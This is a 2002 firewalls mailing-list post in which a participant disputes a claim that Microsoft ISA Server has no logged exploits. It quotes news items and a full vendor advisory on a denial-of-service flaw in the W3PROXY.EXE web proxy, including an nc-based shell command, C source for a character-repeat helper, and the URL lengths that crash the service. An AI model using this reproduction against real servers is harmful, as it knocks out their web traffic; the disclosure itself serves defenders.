On Tue, 16 Apr 2002, Noonan, Wesley wrote: > > > > Looking at the T1 as uplink, I won't suggest a BRICK... especialy since > > you only have 1 firewall in the network. If you would have home users > > using DSL etc, I might change my mind though. > > > > > I was thinking about looking at newer PIXs, Microsoft ISA, and > > Checkpoint > > > Firewall. Of course, I'm not sure where to begin. Any recommendations? > > > > Can someone plase tell me why poeple like the Microsoft ISA Server? > > Because it works? Because last time I checked it had not a single exploit > logged?
Your checking must be a bit outdated and incomplete. I just checked through my widows listings and found quite a few issues logged on ISA over the last few years. some of which have been mentioned here before: > --24 August 2001 Microsoft Releases IIS Lockdown Tool > In the aftermath of Code Red, Microsoft released an IIS Lockdown Tool > that disables many functions and services that could be exploited > by attackers. > http://www.computerworld.com/storyba/0,4125,NAV47_STO63310,00.html > [Editor's (Schultz) Note: I understand the desire to turn off FTP > and SMTP services, too, but I question the wisdom of doing this when > the real problem is IIS Web servers. It is important to disable all > unnecessary services, but having a tool that purports to fix IIS but > then goes and does other things is not necessarily desirable.] > > --17 August 2001 Patch Available for ISA Server 2000 Flaws > Microsoft has issued a patch to repair three holes in its Internet > Security and Acceleration (ISA) Server 2000. Two of the flaws are > memory leaks: one in the voice-over-IP capability, and one in the > proxy service that could lead to denial of service. The third is an > error message-handling problem that could allow attackers to execute > malicious code and use cookies on the affected machines. > http://computerworld.com/nlt/1%2C3590%2CNAV65-663_STO63199_NLTSEC%2C00.html From: SecureXpert DIRECT Bulletin Service <[EMAIL PROTECTED]> Subject: [SX-20010320-2] - Microsoft ISA Server Denial of Service Date: Mon, 16 Apr 2001 11:47:59 -0400 To: [EMAIL PROTECTED] FSC Internet Corp. / SecureXpert Labs Advisory [SX-20010320-2] Denial of Service in Microsoft ISA server v1.0 Summary Microsoft ISA Server 1.0 on Windows 2000 Server SP1 is vulnerable to a simple network-based attack which stops all incoming and outgoing web traffic from passing through the firewall until the firewall is rebooted or the affected service is restarted. If the firewall is configured to use the "Web Publishing" feature (inbound HTTP proxy to a web server), this attack can be performed remotely. Details Microsoft ISA server includes a web proxy component (W3PROXY.EXE) that is used for both the "publishing" of internal web servers to the external network and for proxying of internal requests to external web servers. Sending a URL with a long pathname component to this proxy will cause it to terminate with an access violation error. For example, sending the (valid) HTTP request: GET http://hostname/aaa[3000 more occurences of 'a'] HTTP/1.0\n\n to port 80 on the ISA Server's external interface will cause W3PROXY.EXE to terminate with an access violation. This can easily be reproduced from a Linux system by using the following simple shell command: printf 'GET http://${HOST}/%s HTTP/1.0\n\n' `./repeat ${x} ${y}` | \ nc ${HOST} 80 where: - printf is the shell utility of that name - ${HOST} is an environment variable set to a hostname which resolves to the external IP of the ISA server - ./repeat is the simple C program whose source is given below - ${x} is the ASCII value of the character to insert into the generated URL - ${y} is the number of repetions of ${x} The `repeat' program can be compiled from the following simple C source: The `repeat' program can be compiled from the following simple C source: /* * repeat.c -- quick-n-dirty hack to output argv[2] instances of the * character whose ASCII value is given as argv[1] * * WARNING - this has absolutely no error checking! */ #include <stdio.h> main (int argc, char **argv) { int character; long repetitions, i; if ( argc != 3 ) { printf("usage: repeat char reps\n"); exit(1); } character = atoi(argv[1]); repetitions = atol(argv[2]); for (i = 0L; i < repetitions; i++) { printf ("%c", character); } } The behaviour of W3PROXY.EXE is dependent both on the value of ${x} and the value of ${y}. With ${x} of 55, the following behavious is observed based on the value of ${y}: 100: processes correctly, returns "404 Object Not Found" from target web server. 200: returns 404 250: returns 404 254: returns 404 255: returns "414 URL Too Long" 260: returns 414 300: returns 414 2000: returns 414 2100: returns 414 2200: returns 414 2300: returns 414 2300, repeated several times: W3PROXY.EXE grows to 128MB of process size and is then terminated with an access violation. 2350: W3PROXY.EXE is terminated on the first attempt. All larger values: as 2350, above. ... > > > Without a proper firewall protecting the ISA Server its just going to be > > the > > single point of failure. > > Are you really this uninformed, or are you just playing the part on the net? > That's an awfully agressive statment considering the above. Thanks, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. _______________________________________________ Firewalls mailing list [EMAIL PROTECTED] http://lists.gnac.net/mailman/listinfo/firewalls
